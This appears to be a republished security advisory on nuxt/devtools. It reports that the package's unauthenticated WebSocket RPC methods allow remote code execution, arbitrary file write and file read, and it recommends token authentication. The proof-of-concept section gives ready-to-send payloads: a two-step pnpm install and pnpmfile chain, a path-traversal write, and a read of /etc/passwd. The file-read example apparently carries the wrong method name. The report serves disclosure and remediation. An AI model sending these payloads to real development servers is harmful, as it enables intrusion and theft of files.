Lack of security consideration leads to multiple critical weaknesses
Discription

# Introduction
This report serves more as a suggestion to improve security, rather than fixing any single “vulnerability”. I’ve given examples to demonstrate the impact that neglecting security may have, but these are not the root cause of the issue.

Due to the nature of a package, being able to achieve code execution on the host is guaranteed and intended. Instead of fixing these mistakes, I would recommend adding a form of authentication to verify the requester’s identity, similar to the approach taken by [Werkzeug / Flask](https://flask.palletsprojects.com/en/2.3.x/debugging/).

This process generally involves displaying a secret token on the console, where only the developer can see it, and then prompting for this token to before a WebSocket session starts. After this is successful you can then exchange potentially dangerous commands.

Once a user is authenticated it no longer matters if they can execute commands as they have this ability via the terminal.

# Description
`nuxt/devtools` is a package that provides tools for developers to inspect and debug their applications from a web interface.

Developer mode vulnerabilities may seem insignificant but they present risks for developers and servers with accidental misconfigurations. You can read more about the impact of [development vulnerabilities in nuxt3 here](https://bryces.io/blog/nuxt3).

The package provides several remote process calls over WebSocket using [tinyws](https://github.com/tinyhttp/tinyws) and [birpc](https://github.com/antfu/birpc).

There any many interesting commands that we can call, with various weaknesses:

`runNpmCommand` – Can be abused for RCE

`writeStaticAssets` – Can be abused for arbitrary file write

`getTextAssetContent` – Can be abused for arbitrary file read (and then RCE)

`installNuxtModule` – Potential RCE

`setStorageItem` – Potential RCE

# Proof of Concept
There are multiple ways to do bad things, here are some examples of what’s possible.

Code execution in two steps with pnpm:
“`ts
// Step 1, send the following payload to the WebSocket server
// This will install the package “rce-demo”
// Final output is: “pnpm install rce-demo –no-scripts”
[{“m”:”1″,”a”:”2″,”t”:”3″,”i”:”4″},”runNpmCommand”,[“5”, “6”],”q”, “x”, “install”, “rce-demo”]

// Step 2, send the following payload to the WebSocket server
// pnpm will load the file @lastest within the /rce-demo folder, this will trigger RCE with a calc popup.
// Final output is: “pnpm install –config.pnpmfile=./node_modules/rce-demo/@latest”
[{“m”:”1″,”a”:”2″,”t”:”3″,”i”:”4″},”runNpmCommand”,[“5”, “6”],”q”, “x”, “install”, “–config.pnpmfile=./node_modules/rce-demo/”]
“`

Arbitrary file write:
“`ts
// Write any file provided it doesn’t already exist
// Data needs to be base64
[{“m”:”1″,”a”:”2″,”t”:”3″,”i”:”4″},”writeStaticAssets”,[“5”, “6”],”q”, “blah”, [{ “name”: “test.txt”, “data”: “YmFsbHM=”}], “../../../../../”]
“`

Arbitrary file read:
“`ts
// Read any file, the last argument is the file length limit
// If you don’t know how large a file is you can use -1 to read all but the last char.
[{“m”:”1″,”a”:”2″,”t”:”3″,”i”:”4″},”writeStaticAssets”,[“5”, “6”],”q”, “blah”, “/etc/passwd”, 999999]
“`

[Example written in Golang](https://gist.github.com/OhB00/906e67351eec005d5cf11843ee1c0436).Read More

Back to Main

Subscribe for the latest news: